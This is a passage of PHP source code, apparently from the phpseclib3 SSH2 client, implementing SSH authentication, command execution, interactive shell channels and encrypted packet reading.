obtaining the requested information from the user, the client MUST respond with an SSH_MSG_USERAUTH_INFO_RESPONSE message. */ // see http://tools.ietf.org/html/rfc4256#section-3.4 $packet = $logged = pack('CN', NET_SSH2_MSG_USERAUTH_INFO_RESPONSE, count($responses)); for ($i = 0; $i < count($responses); $i++) { $packet .= Strings::packSSH2('s', $responses[$i]); $logged .= Strings::packSSH2('s', 'dummy-answer'); } $this->send_binary_packet($packet, $logged); $this->updateLogHistory('UNKNOWN (61)', 'NET_SSH2_MSG_USERAUTH_INFO_RESPONSE'); /* After receiving the response, the server MUST send either an SSH_MSG_USERAUTH_SUCCESS, SSH_MSG_USERAUTH_FAILURE, or another SSH_MSG_USERAUTH_INFO_REQUEST message. */ // maybe phpseclib should force close the connection after x request / responses? unless something like that is done // there could be an infinite loop of request / responses. return $this->keyboard_interactive_process(); case NET_SSH2_MSG_USERAUTH_SUCCESS: return true; case NET_SSH2_MSG_USERAUTH_FAILURE: list($auth_methods) = Strings::unpackSSH2('L', $response); $this->auth_methods_to_continue = $auth_methods; return false; } return false; } /** * Login with an ssh-agent provided key * * @param string $username * @param \phpseclib3\System\SSH\Agent $agent * @return bool */ private function ssh_agent_login($username, Agent $agent) { $this->agent = $agent; $keys = $agent->requestIdentities(); foreach ($keys as $key) { if ($this->privatekey_login($username, $key)) { return true; } } return false; } /** * Login with an RSA private key * * {@internal It might be worthwhile, at some point, to protect against {@link http://tools.ietf.org/html/rfc4251#section-9.3.9 traffic analysis} * by sending dummy SSH_MSG_IGNORE messages.} * * @param string $username * @param \phpseclib3\Crypt\Common\PrivateKey $privatekey * @return bool * @throws \RuntimeException on connection error */ private function privatekey_login($username, PrivateKey $privatekey) { $publickey = $privatekey->getPublicKey(); if ($publickey instanceof RSA) { $privatekey = $privatekey->withPadding(RSA::SIGNATURE_PKCS1); $algos = ['rsa-sha2-256', 'rsa-sha2-512', 'ssh-rsa']; if (isset($this->preferred['hostkey'])) { $algos = array_intersect($algos, $this->preferred['hostkey']); } $algo = self::array_intersect_first($algos, $this->supported_private_key_algorithms); switch ($algo) { case 'rsa-sha2-512': $hash = 'sha512'; $signatureType = 'rsa-sha2-512'; break; case 'rsa-sha2-256': $hash = 'sha256'; $signatureType = 'rsa-sha2-256'; break; //case 'ssh-rsa': default: $hash = 'sha1'; $signatureType = 'ssh-rsa'; } } elseif ($publickey instanceof EC) { $privatekey = $privatekey->withSignatureFormat('SSH2'); $curveName = $privatekey->getCurve(); switch ($curveName) { case 'Ed25519': $hash = 'sha512'; $signatureType = 'ssh-ed25519'; break; case 'secp256r1': // nistp256 $hash = 'sha256'; $signatureType = 'ecdsa-sha2-nistp256'; break; case 'secp384r1': // nistp384 $hash = 'sha384'; $signatureType = 'ecdsa-sha2-nistp384'; break; case 'secp521r1': // nistp521 $hash = 'sha512'; $signatureType = 'ecdsa-sha2-nistp521'; break; default: if (is_array($curveName)) { throw new UnsupportedCurveException('Specified Curves are not supported by SSH2'); } throw new UnsupportedCurveException('Named Curve of ' . $curveName . ' is not supported by phpseclib3\'s SSH2 implementation'); } } elseif ($publickey instanceof DSA) { $privatekey = $privatekey->withSignatureFormat('SSH2'); $hash = 'sha1'; $signatureType = 'ssh-dss'; } else { throw new UnsupportedAlgorithmException('Please use either an RSA key, an EC one or a DSA key'); } $publickeyStr = $publickey->toString('OpenSSH', ['binary' => true]); $part1 = Strings::packSSH2( 'Csss', NET_SSH2_MSG_USERAUTH_REQUEST, $username, 'ssh-connection', 'publickey' ); $part2 = Strings::packSSH2('ss', $signatureType, $publickeyStr); $packet = $part1 . chr(0) . $part2; $this->send_binary_packet($packet); $response = $this->get_binary_packet(); list($type) = Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_FAILURE: list($auth_methods) = Strings::unpackSSH2('L', $response); if (in_array('publickey', $auth_methods) && substr($signatureType, 0, 9) == 'rsa-sha2-') { $this->supported_private_key_algorithms = array_diff($this->supported_private_key_algorithms, ['rsa-sha2-256', 'rsa-sha2-512']); return $this->privatekey_login($username, $privatekey); } $this->auth_methods_to_continue = $auth_methods; $this->errors[] = 'SSH_MSG_USERAUTH_FAILURE'; return false; case NET_SSH2_MSG_USERAUTH_PK_OK: // we'll just take it on faith that the public key blob and the public key algorithm name are as // they should be $this->updateLogHistory('UNKNOWN (60)', 'NET_SSH2_MSG_USERAUTH_PK_OK'); break; case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return true; default: $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new ConnectionClosedException('Unexpected response to publickey authentication pt 1'); } $packet = $part1 . chr(1) . $part2; $privatekey = $privatekey->withHash($hash); $signature = $privatekey->sign(Strings::packSSH2('s', $this->session_id) . $packet); if ($publickey instanceof RSA) { $signature = Strings::packSSH2('ss', $signatureType, $signature); } $packet .= Strings::packSSH2('s', $signature); $this->send_binary_packet($packet); $response = $this->get_binary_packet(); list($type) = Strings::unpackSSH2('C', $response); switch ($type) { case NET_SSH2_MSG_USERAUTH_FAILURE: // either the login is bad or the server employs multi-factor authentication list($auth_methods) = Strings::unpackSSH2('L', $response); $this->auth_methods_to_continue = $auth_methods; return false; case NET_SSH2_MSG_USERAUTH_SUCCESS: $this->bitmap |= self::MASK_LOGIN; return true; } $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new ConnectionClosedException('Unexpected response to publickey authentication pt 2'); } /** * Return the currently configured timeout * * @return int */ public function getTimeout() { return $this->timeout; } /** * Set Timeout * * $ssh->exec('ping'); on a Linux host will never return and will run indefinitely. setTimeout() makes it so it'll timeout. * Setting $timeout to false or 0 will mean there is no timeout. * * @param mixed $timeout */ public function setTimeout($timeout) { $this->timeout = $this->curTimeout = $timeout; } /** * Set Keep Alive * * Sends an SSH2_MSG_IGNORE message every x seconds, if x is a positive non-zero number. * * @param int $interval */ public function setKeepAlive($interval) { $this->keepAlive = $interval; } /** * Get the output from stdError * */ public function getStdError() { return $this->stdErrorLog; } /** * Execute Command * * If $callback is set to false then \phpseclib3\Net\SSH2::get_channel_packet(self::CHANNEL_EXEC) will need to be called manually. * In all likelihood, this is not a feature you want to be taking advantage of. * * @param string $command * @return string|bool * @psalm-return ($callback is callable ? bool : string|bool) * @throws \RuntimeException on connection error */ public function exec($command, callable $callback = null) { $this->curTimeout = $this->timeout; $this->is_timeout = false; $this->stdErrorLog = ''; if (!$this->isAuthenticated()) { return false; } //if ($this->isPTYOpen()) { // throw new \RuntimeException('If you want to run multiple exec()\'s you will need to disable (and re-enable if appropriate) a PTY for each one.'); //} $this->openChannel(self::CHANNEL_EXEC); if ($this->request_pty === true) { $terminal_modes = pack('C', NET_SSH2_TTY_OP_END); $packet = Strings::packSSH2( 'CNsCsN4s', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_EXEC], 'pty-req', 1, $this->term, $this->windowColumns, $this->windowRows, 0, 0, $terminal_modes ); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_EXEC] = NET_SSH2_MSG_CHANNEL_REQUEST; if (!$this->get_channel_packet(self::CHANNEL_EXEC)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unable to request pseudo-terminal'); } } // sending a pty-req SSH_MSG_CHANNEL_REQUEST message is unnecessary and, in fact, in most cases, slows things // down. the one place where it might be desirable is if you're doing something like \phpseclib3\Net\SSH2::exec('ping localhost &'). // with a pty-req SSH_MSG_CHANNEL_REQUEST, exec() will return immediately and the ping process will then // then immediately terminate. without such a request exec() will loop indefinitely. the ping process won't end but // neither will your script. // although, in theory, the size of SSH_MSG_CHANNEL_REQUEST could exceed the maximum packet size established by // SSH_MSG_CHANNEL_OPEN_CONFIRMATION, RFC4254#section-5.1 states that the "maximum packet size" refers to the // "maximum size of an individual data packet". ie. SSH_MSG_CHANNEL_DATA. RFC4254#section-5.2 corroborates. $packet = Strings::packSSH2( 'CNsCs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_EXEC], 'exec', 1, $command ); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_EXEC] = NET_SSH2_MSG_CHANNEL_REQUEST; if (!$this->get_channel_packet(self::CHANNEL_EXEC)) { return false; } $this->channel_status[self::CHANNEL_EXEC] = NET_SSH2_MSG_CHANNEL_DATA; if ($this->request_pty === true) { $this->channel_id_last_interactive = self::CHANNEL_EXEC; return true; } $output = ''; while (true) { $temp = $this->get_channel_packet(self::CHANNEL_EXEC); switch (true) { case $temp === true: return is_callable($callback) ? true : $output; case $temp === false: return false; default: if (is_callable($callback)) { if ($callback($temp) === true) { $this->close_channel(self::CHANNEL_EXEC); return true; } } else { $output .= $temp; } } } } /** * How many channels are currently open? * * @return int */ public function getOpenChannelCount() { return $this->channelCount; } /** * Opens a channel * * @param string $channel * @param bool $skip_extended * @return bool */ protected function openChannel($channel, $skip_extended = false) { if (isset($this->channel_status[$channel]) && $this->channel_status[$channel] != NET_SSH2_MSG_CHANNEL_CLOSE) { throw new \RuntimeException('Please close the channel (' . $channel . ') before trying to open it again'); } $this->channelCount++; if ($this->channelCount > 1 && $this->errorOnMultipleChannels) { throw new \RuntimeException("Ubuntu's OpenSSH from 5.8 to 6.9 doesn't work with multiple channels"); } // RFC4254 defines the (client) window size as "bytes the other party can send before it must wait for the window to // be adjusted". 0x7FFFFFFF is, at 2GB, the max size. technically, it should probably be decremented, but, // honestly, if you're transferring more than 2GB, you probably shouldn't be using phpseclib, anyway. // see http://tools.ietf.org/html/rfc4254#section-5.2 for more info $this->window_size_server_to_client[$channel] = $this->window_size; // 0x8000 is the maximum max packet size, per http://tools.ietf.org/html/rfc4253#section-6.1, although since PuTTy // uses 0x4000, that's what will be used here, as well. $packet_size = 0x4000; $packet = Strings::packSSH2( 'CsN3', NET_SSH2_MSG_CHANNEL_OPEN, 'session', $channel, $this->window_size_server_to_client[$channel], $packet_size ); $this->send_binary_packet($packet); $this->channel_status[$channel] = NET_SSH2_MSG_CHANNEL_OPEN; return $this->get_channel_packet($channel, $skip_extended); } /** * Creates an interactive shell * * Returns bool(true) if the shell was opened. * Returns bool(false) if the shell was already open. * * @see self::isShellOpen() * @see self::read() * @see self::write() * @return bool * @throws InsufficientSetupException if not authenticated * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors */ public function openShell() { if (!$this->isAuthenticated()) { throw new InsufficientSetupException('Operation disallowed prior to login()'); } $this->openChannel(self::CHANNEL_SHELL); $terminal_modes = pack('C', NET_SSH2_TTY_OP_END); $packet = Strings::packSSH2( 'CNsbsN4s', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_SHELL], 'pty-req', true, // want reply $this->term, $this->windowColumns, $this->windowRows, 0, 0, $terminal_modes ); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_SHELL] = NET_SSH2_MSG_CHANNEL_REQUEST; if (!$this->get_channel_packet(self::CHANNEL_SHELL)) { throw new \RuntimeException('Unable to request pty'); } $packet = Strings::packSSH2( 'CNsb', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_SHELL], 'shell', true // want reply ); $this->send_binary_packet($packet); $response = $this->get_channel_packet(self::CHANNEL_SHELL); if ($response === false) { throw new \RuntimeException('Unable to request shell'); } $this->channel_status[self::CHANNEL_SHELL] = NET_SSH2_MSG_CHANNEL_DATA; $this->channel_id_last_interactive = self::CHANNEL_SHELL; $this->bitmap |= self::MASK_SHELL; return true; } /** * Return the channel to be used with read(), write(), and reset(), if none were specified * @deprecated for lack of transparency in intended channel target, to be potentially replaced * with method which guarantees open-ness of all yielded channels and throws * error for multiple open channels * @see self::read() * @see self::write() * @return int */ private function get_interactive_channel() { switch (true) { case $this->is_channel_status_data(self::CHANNEL_SUBSYSTEM): return self::CHANNEL_SUBSYSTEM; case $this->is_channel_status_data(self::CHANNEL_EXEC): return self::CHANNEL_EXEC; default: return self::CHANNEL_SHELL; } } /** * Indicates the DATA status on the given channel * * @param int $channel The channel number to evaluate * @return bool */ private function is_channel_status_data($channel) { return isset($this->channel_status[$channel]) && $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_DATA; } /** * Return an available open channel * * @return int */ private function get_open_channel() { $channel = self::CHANNEL_EXEC; do { if (isset($this->channel_status[$channel]) && $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_OPEN) { return $channel; } } while ($channel++ < self::CHANNEL_SUBSYSTEM); return false; } /** * Request agent forwarding of remote server * * @return bool */ public function requestAgentForwarding() { $request_channel = $this->get_open_channel(); if ($request_channel === false) { return false; } $packet = Strings::packSSH2( 'CNsC', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[$request_channel], 'auth-agent-req@openssh.com', 1 ); $this->channel_status[$request_channel] = NET_SSH2_MSG_CHANNEL_REQUEST; $this->send_binary_packet($packet); if (!$this->get_channel_packet($request_channel)) { return false; } $this->channel_status[$request_channel] = NET_SSH2_MSG_CHANNEL_OPEN; return true; } /** * Returns the output of an interactive shell * * Returns when there's a match for $expect, which can take the form of a string literal or, * if $mode == self::READ_REGEX, a regular expression. * * If not specifying a channel, an open interactive channel will be selected, or, if there are * no open channels, an interactive shell will be created. If there are multiple open * interactive channels, a legacy behavior will apply in which channel selection prioritizes * an active subsystem, the exec pty, and, lastly, the shell. If using multiple interactive * channels, callers are discouraged from relying on this legacy behavior and should specify * the intended channel. * * @see self::write() * @param string $expect * @param int $mode One of the self::READ_* constants * @param int|null $channel Channel id returned by self::getInteractiveChannelId() * @return string|bool|null * @throws \RuntimeException on connection error * @throws InsufficientSetupException on unexpected channel status, possibly due to closure */ public function read($expect = '', $mode = self::READ_SIMPLE, $channel = null) { if (!$this->isAuthenticated()) { throw new InsufficientSetupException('Operation disallowed prior to login()'); } $this->curTimeout = $this->timeout; $this->is_timeout = false; if ($channel === null) { $channel = $this->get_interactive_channel(); } if (!$this->is_channel_status_data($channel) && empty($this->channel_buffers[$channel])) { if ($channel != self::CHANNEL_SHELL) { throw new InsufficientSetupException('Data is not available on channel'); } elseif (!$this->openShell()) { throw new \RuntimeException('Unable to initiate an interactive shell session'); } } if ($mode == self::READ_NEXT) { return $this->get_channel_packet($channel); } $match = $expect; while (true) { if ($mode == self::READ_REGEX) { preg_match($expect, substr($this->interactiveBuffer, -1024), $matches); $match = isset($matches[0]) ? $matches[0] : ''; } $pos = strlen($match) ? strpos($this->interactiveBuffer, $match) : false; if ($pos !== false) { return Strings::shift($this->interactiveBuffer, $pos + strlen($match)); } $response = $this->get_channel_packet($channel); if ($response === true) { return Strings::shift($this->interactiveBuffer, strlen($this->interactiveBuffer)); } $this->interactiveBuffer .= $response; } } /** * Inputs a command into an interactive shell. * * If not specifying a channel, an open interactive channel will be selected, or, if there are * no open channels, an interactive shell will be created. If there are multiple open * interactive channels, a legacy behavior will apply in which channel selection prioritizes * an active subsystem, the exec pty, and, lastly, the shell. If using multiple interactive * channels, callers are discouraged from relying on this legacy behavior and should specify * the intended channel. * * @see SSH2::read() * @param string $cmd * @param int|null $channel Channel id returned by self::getInteractiveChannelId() * @return void * @throws \RuntimeException on connection error * @throws InsufficientSetupException on unexpected channel status, possibly due to closure */ public function write($cmd, $channel = null) { if (!$this->isAuthenticated()) { throw new InsufficientSetupException('Operation disallowed prior to login()'); } if ($channel === null) { $channel = $this->get_interactive_channel(); } if (!$this->is_channel_status_data($channel)) { if ($channel != self::CHANNEL_SHELL) { throw new InsufficientSetupException('Data is not available on channel'); } elseif (!$this->openShell()) { throw new \RuntimeException('Unable to initiate an interactive shell session'); } } $this->send_channel_packet($channel, $cmd); } /** * Start a subsystem. * * Right now only one subsystem at a time is supported. To support multiple subsystem's stopSubsystem() could accept * a string that contained the name of the subsystem, but at that point, only one subsystem of each type could be opened. * To support multiple subsystem's of the same name maybe it'd be best if startSubsystem() generated a new channel id and * returns that and then that that was passed into stopSubsystem() but that'll be saved for a future date and implemented * if there's sufficient demand for such a feature. * * @see self::stopSubsystem() * @param string $subsystem * @return bool */ public function startSubsystem($subsystem) { $this->openChannel(self::CHANNEL_SUBSYSTEM); $packet = Strings::packSSH2( 'CNsCs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL_SUBSYSTEM], 'subsystem', 1, $subsystem ); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL_SUBSYSTEM] = NET_SSH2_MSG_CHANNEL_REQUEST; if (!$this->get_channel_packet(self::CHANNEL_SUBSYSTEM)) { return false; } $this->channel_status[self::CHANNEL_SUBSYSTEM] = NET_SSH2_MSG_CHANNEL_DATA; $this->channel_id_last_interactive = self::CHANNEL_SUBSYSTEM; return true; } /** * Stops a subsystem. * * @see self::startSubsystem() * @return bool */ public function stopSubsystem() { if ($this->isInteractiveChannelOpen(self::CHANNEL_SUBSYSTEM)) { $this->close_channel(self::CHANNEL_SUBSYSTEM); } return true; } /** * Closes a channel * * If read() timed out you might want to just close the channel and have it auto-restart on the next read() call * * If not specifying a channel, an open interactive channel will be selected. If there are * multiple open interactive channels, a legacy behavior will apply in which channel selection * prioritizes an active subsystem, the exec pty, and, lastly, the shell. If using multiple * interactive channels, callers are discouraged from relying on this legacy behavior and * should specify the intended channel. * * @param int|null $channel Channel id returned by self::getInteractiveChannelId() * @return void */ public function reset($channel = null) { if ($channel === null) { $channel = $this->get_interactive_channel(); } if ($this->isInteractiveChannelOpen($channel)) { $this->close_channel($channel); } } /** * Is timeout? * * Did exec() or read() return because they timed out or because they encountered the end? * */ public function isTimeout() { return $this->is_timeout; } /** * Disconnect * */ public function disconnect() { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); if (isset($this->realtime_log_file) && is_resource($this->realtime_log_file)) { fclose($this->realtime_log_file); } unset(self::$connections[$this->getResourceId()]); } /** * Destructor. * * Will be called, automatically, if you're supporting just PHP5. If you're supporting PHP4, you'll need to call * disconnect(). * */ public function __destruct() { $this->disconnect(); } /** * Is the connection still active? * * @return bool */ public function isConnected() { return ($this->bitmap & self::MASK_CONNECTED) && is_resource($this->fsock) && !feof($this->fsock); } /** * Have you successfully been logged in? * * @return bool */ public function isAuthenticated() { return (bool) ($this->bitmap & self::MASK_LOGIN); } /** * Is the interactive shell active? * * @return bool */ public function isShellOpen() { return $this->isInteractiveChannelOpen(self::CHANNEL_SHELL); } /** * Is the exec pty active? * * @return bool */ public function isPTYOpen() { return $this->isInteractiveChannelOpen(self::CHANNEL_EXEC); } /** * Is the given interactive channel active? * * @param int $channel Channel id returned by self::getInteractiveChannelId() * @return bool */ public function isInteractiveChannelOpen($channel) { return $this->isAuthenticated() && $this->is_channel_status_data($channel); } /** * Returns a channel identifier, presently of the last interactive channel opened, regardless of current status. * Returns 0 if no interactive channel has been opened. * * @see self::isInteractiveChannelOpen() * @return int */ public function getInteractiveChannelId() { return $this->channel_id_last_interactive; } /** * Pings a server connection, or tries to reconnect if the connection has gone down * * Inspired by http://php.net/manual/en/mysqli.ping.php * * @return bool */ public function ping() { if (!$this->isAuthenticated()) { if (!empty($this->auth)) { return $this->reconnect(); } return false; } try { $this->openChannel(self::CHANNEL_KEEP_ALIVE); } catch (\RuntimeException $e) { return $this->reconnect(); } $this->close_channel(self::CHANNEL_KEEP_ALIVE); return true; } /** * In situ reconnect method * * @return boolean */ private function reconnect() { $this->reset_connection(NET_SSH2_DISCONNECT_CONNECTION_LOST); $this->retry_connect = true; $this->connect(); foreach ($this->auth as $auth) { $result = $this->login(...$auth); } return $result; } /** * Resets a connection for re-use * * @param int $reason */ protected function reset_connection($reason) { $this->disconnect_helper($reason); $this->decrypt = $this->encrypt = false; $this->decrypt_block_size = $this->encrypt_block_size = 8; $this->hmac_check = $this->hmac_create = false; $this->hmac_size = false; $this->session_id = false; $this->retry_connect = true; $this->get_seq_no = $this->send_seq_no = 0; $this->channel_status = []; $this->channel_id_last_interactive = 0; } /** * Gets Binary Packets * * See '6. Binary Packet Protocol' of rfc4253 for more info. * * @see self::_send_binary_packet() * @param bool $skip_channel_filter * @return bool|string */ private function get_binary_packet($skip_channel_filter = false) { if ($skip_channel_filter) { if (!is_resource($this->fsock)) { throw new \InvalidArgumentException('fsock is not a resource.'); } $read = [$this->fsock]; $write = $except = null; if (!$this->curTimeout) { if ($this->keepAlive <= 0) { static::stream_select($read, $write, $except, null); } else { if (!static::stream_select($read, $write, $except, $this->keepAlive)) { $this->send_binary_packet(pack('CN', NET_SSH2_MSG_IGNORE, 0)); return $this->get_binary_packet(true); } } } else { if ($this->curTimeout < 0) { $this->is_timeout = true; return true; } $start = microtime(true); if ($this->keepAlive > 0 && $this->keepAlive < $this->curTimeout) { if (!static::stream_select($read, $write, $except, $this->keepAlive)) { $this->send_binary_packet(pack('CN', NET_SSH2_MSG_IGNORE, 0)); $elapsed = microtime(true) - $start; $this->curTimeout -= $elapsed; return $this->get_binary_packet(true); } $elapsed = microtime(true) - $start; $this->curTimeout -= $elapsed; } $sec = (int) floor($this->curTimeout); $usec = (int) (1000000 * ($this->curTimeout - $sec)); // this can return a "stream_select(): unable to select [4]: Interrupted system call" error if (!static::stream_select($read, $write, $except, $sec, $usec)) { $this->is_timeout = true; return true; } $elapsed = microtime(true) - $start; $this->curTimeout -= $elapsed; } } if (!is_resource($this->fsock) || feof($this->fsock)) { $this->bitmap = 0; $str = 'Connection closed (by server) prematurely'; if (isset($elapsed)) { $str .= ' ' . $elapsed . 's'; } throw new ConnectionClosedException($str); } $start = microtime(true); $raw = stream_get_contents($this->fsock, $this->decrypt_block_size); if (!strlen($raw)) { $this->bitmap = 0; throw new ConnectionClosedException('No data received from server'); } if ($this->decrypt) { switch ($this->decryptName) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': $this->decrypt->setNonce( $this->decryptFixedPart . $this->decryptInvocationCounter ); Strings::increment_str($this->decryptInvocationCounter); $this->decrypt->setAAD($temp = Strings::shift($raw, 4)); extract(unpack('Npacket_length', $temp)); /** * @var integer $packet_length */ $raw .= $this->read_remaining_bytes($packet_length - $this->decrypt_block_size + 4); $stop = microtime(true); $tag = stream_get_contents($this->fsock, $this->decrypt_block_size); $this->decrypt->setTag($tag); $raw = $this->decrypt->decrypt($raw); $raw = $temp . $raw; $remaining_length = 0; break; case 'chacha20-poly1305@openssh.com': // This should be impossible, but we are checking anyway to narrow the type for Psalm. if (!($this->decrypt instanceof ChaCha20)) { throw new \LogicException('$this->decrypt is not a ' . ChaCha20::class); } $nonce = pack('N2', 0, $this->get_seq_no); $this->lengthDecrypt->setNonce($nonce); $temp = $this->lengthDecrypt->decrypt($aad = Strings::shift($raw, 4)); extract(unpack('Npacket_length', $temp)); /** * @var integer $packet_length */ $raw .= $this->read_remaining_bytes($packet_length - $this->decrypt_block_size + 4); $stop = microtime(true); $tag = stream_get_contents($this->fsock, 16); $this->decrypt->setNonce($nonce); $this->decrypt->setCounter(0); // this is the same approach that's implemented in Salsa20::createPoly1305Key() // but we don't want to use the same AEAD construction that RFC8439 describes // for ChaCha20-Poly1305 so we won't rely on it (see Salsa20::poly1305()) $this->decrypt->setPoly1305Key( $this->decrypt->encrypt(str_repeat("\0", 32)) ); $this->decrypt->setAAD($aad); $this->decrypt->setCounter(1); $this->decrypt->setTag($tag); $raw = $this->decrypt->decrypt($raw); $raw = $temp . $raw; $remaining_length = 0; break; default: if (!$this->hmac_check instanceof Hash || !$this->hmac_check_etm) { $raw = $this->decrypt->decrypt($raw); break; } extract(unpack('Npacket_length', $temp = Strings::shift($raw, 4))); /** * @var integer $packet_length */ $raw .= $this->read_remaining_bytes($packet_length - $this->decrypt_block_size + 4); $stop = microtime(true); $encrypted = $temp . $raw; $raw = $temp . $this->decrypt->decrypt($raw); $remaining_length = 0; } } if (strlen($raw) < 5) { $this->bitmap = 0; throw new \RuntimeException('Plaintext is too short'); } extract(unpack('Npacket_length/Cpadding_length', Strings::shift($raw, 5))); /** * @var integer $packet_length * @var integer $padding_length */ if (!isset($remaining_length)) { $remaining_length = $packet_length + 4 - $this->decrypt_block_size; } $buffer = $this->read_remaining_bytes($remaining_length); if (!isset($stop)) { $stop = microtime(true); } if (strlen($buffer)) { $raw .= $this->decrypt ? $this->decrypt->decrypt($buffer) : $buffer; } $payload = Strings::shift($raw, $packet_length - $padding_length - 1); $padding = Strings::shift($raw, $padding_length); // should leave $raw empty if ($this->hmac_check instanceof Hash) { $hmac = stream_get_contents($this->fsock, $this->hmac_size); if ($hmac === false || strlen($hmac) != $this->hmac_size) { $this->disconnect_helper(NET_SSH2_DISCONNECT_MAC_ERROR); throw new \RuntimeException('Error reading socket'); } $reconstructed = !$this->hmac_check_etm ? pack('NCa*', $packet_length, $padding_length, $payload . $padding) : $encrypted; if (($this->hmac_check->getHash() & "\xFF\xFF\xFF\xFF") == 'umac') { $this->hmac_check->setNonce("\0\0\0\0" . pack('N', $this->get_seq_no)); if ($hmac != $this->hmac_check->hash($reconstructed)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_MAC_ERROR); throw new \RuntimeException('Invalid UMAC'); } } else { if ($hmac != $this->hmac_check->hash(pack('Na*', $this->get_seq_no, $reconstructed))) { $this->disconnect_helper(NET_SSH2_DISCONNECT_MAC_ERROR); throw new \RuntimeException('Invalid HMAC'); } } } switch ($this->decompress) { case self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH: if (!$this->isAuthenticated()) { break; } // fall-through case self::NET_SSH2_COMPRESSION_ZLIB: if ($this->regenerate_decompression_context) { $this->regenerate_decompression_context = false; $cmf = ord($payload[0]); $cm = $cmf & 0x0F; if ($cm != 8) { // deflate user_error("Only CM = 8 ('deflate') is supported ($cm)"); } $cinfo = ($cmf & 0xF0) >> 4; if ($cinfo > 7) { user_error("CINFO above 7 is not allowed ($cinfo)"); } $windowSize = 1 << ($cinfo + 8); $flg = ord($payload[1]); //$fcheck = $flg && 0x0F; if ((($cmf << 8) | $flg) % 31) { user_error('fcheck failed'); } $fdict = boolval($flg & 0x20); $flevel = ($flg & 0xC0) >> 6; $this->decompress_context = inflate_init(ZLIB_ENCODING_RAW, ['window' => $cinfo + 8]); $payload = substr($payload, 2); } if ($this->decompress_context) { $payload = inflate_add($this->decompress_context, $payload, ZLIB_PARTIAL_FLUSH); } } $this->get_seq_no++; if (defined('NET_SSH2_LOGGING')) { $current = microtime(true); $message_number = isset(self::$message_numbers[ord($payload[0])]) ? self::$message_numbers[ord($payload[0])] : 'UNKNOWN (' . ord($payload[0]) . ')'; $message_number = '<- ' . $message_number . ' (since last: ' . round($current - $this->last_packet, 4) . ', network: ' . round($stop - $start, 4) . 's)'; $this->append_log($message_number, $payload); $this->last_packet = $current; } return $this->filter($payload, $skip_channel_filter); } /** * Read Remaining Bytes * * @see self::get_binary_packet() * @param int $remaining_length * @return string */ private function read_remaining_bytes($remaining_length) { if (!$remaining_length) { return ''; } $adjustLength = false; if ($this->decrypt) { switch (true) { case $this->decryptName == 'aes128-gcm@openssh.com': case $this->decryptName == 'aes256-gcm@openssh.com': case $this->decryptName == 'chacha20-poly1305@openssh.com': case $this->hmac_check instanceof Hash && $this->hmac_check_etm: $remaining_length += $this->decrypt_block_size - 4; $adjustLength = true; } } // quoting , // "implementations SHOULD check that the packet length is reasonable" // PuTTY uses 0x9000 as the actual max packet size and so to shall we // don't do this when GCM mode is used since GCM mode doesn't encrypt the length if ($remaining_length < -$this->decrypt_block_size || $remaining_length > 0x9000 || $remaining_length % $this->decrypt_block_size != 0) { if (!$this->bad_key_size_fix && self::bad_algorithm_candidate($this->decrypt ? $this->decryptName : '') && !($this->bitmap & SSH2::MASK_LOGIN)) { $this->bad_key_size_fix = true; $this->reset_connection(NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED); return false; } throw new \RuntimeException('Invalid size'); } if ($adjustLength) { $remaining_length -= $this->decrypt_block_size - 4; } $buffer = ''; while ($remaining_length > 0) { $temp = stream_get_contents($this->fsock, $remaining_length); if ($temp === false || feof($this->fsock)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw new \RuntimeException('Error reading from socket'); } $buffer .= $temp; $remaining_length -= strlen($temp); } return $buffer; } /** * Filter Binary Packets * * Because some binary packets need to be ignored... * * @see self::_get_binary_packet() * @param string $payload * @param bool $skip_channel_filter * @return string|bool */ private function filter($payload, $skip_channel_filter) { switch (ord($payload[0])) { case NET_SSH2_MSG_DISCONNECT: Strings::shift($payload, 1); list($reason_code, $message) = Strings::unpackSSH2('Ns', $payload); $this->errors[] = 'SSH_MSG_DISCONNECT: ' . self::$disconnect_reasons[$reason_code] . "\r\n$message"; $this->bitmap = 0; return false; case NET_SSH2_MSG_IGNORE: $this->extra_packets++; $payload = $this->get_binary_packet($skip_channel_filter); break; case NET_SSH2_MSG_DEBUG: $this->extra_packets++; Strings::shift($payload, 2); // second byte is "always_display" list($message) = Strings::unpackSSH2('s', $payload); $this->errors[] = "SSH_MSG_DEBUG: $message"; $payload = $this->get_binary_packet($skip_channel_filter); break; case NET_SSH2_MSG_UNIMPLEMENTED: return false; case NET_SSH2_MSG_KEXINIT: // this is here for key re-exchanges after the initial key exchange if ($this->session_id !== false) { if (!$this->key_exchange($payload)) { $this->bitmap = 0; return false; } $payload = $this->get_binary_packet($skip_channel_filter); } } // see http://tools.ietf.org/html/rfc4252#section-5.4; only called when the encryption has been activated and when we haven't already logged in if (($this->bitmap & self::MASK_CONNECTED) && !$this->isAuthenticated() && !is_bool($payload) && ord($payload[0]) == NET_SSH2_MSG_USERAUTH_BANNER) { Strings::shift($payload, 1); list($this->banner_message) = Strings::unpackSSH2('s', $payload); $payload = $this->get_binary_packet(); } // only called when we've already logged in if 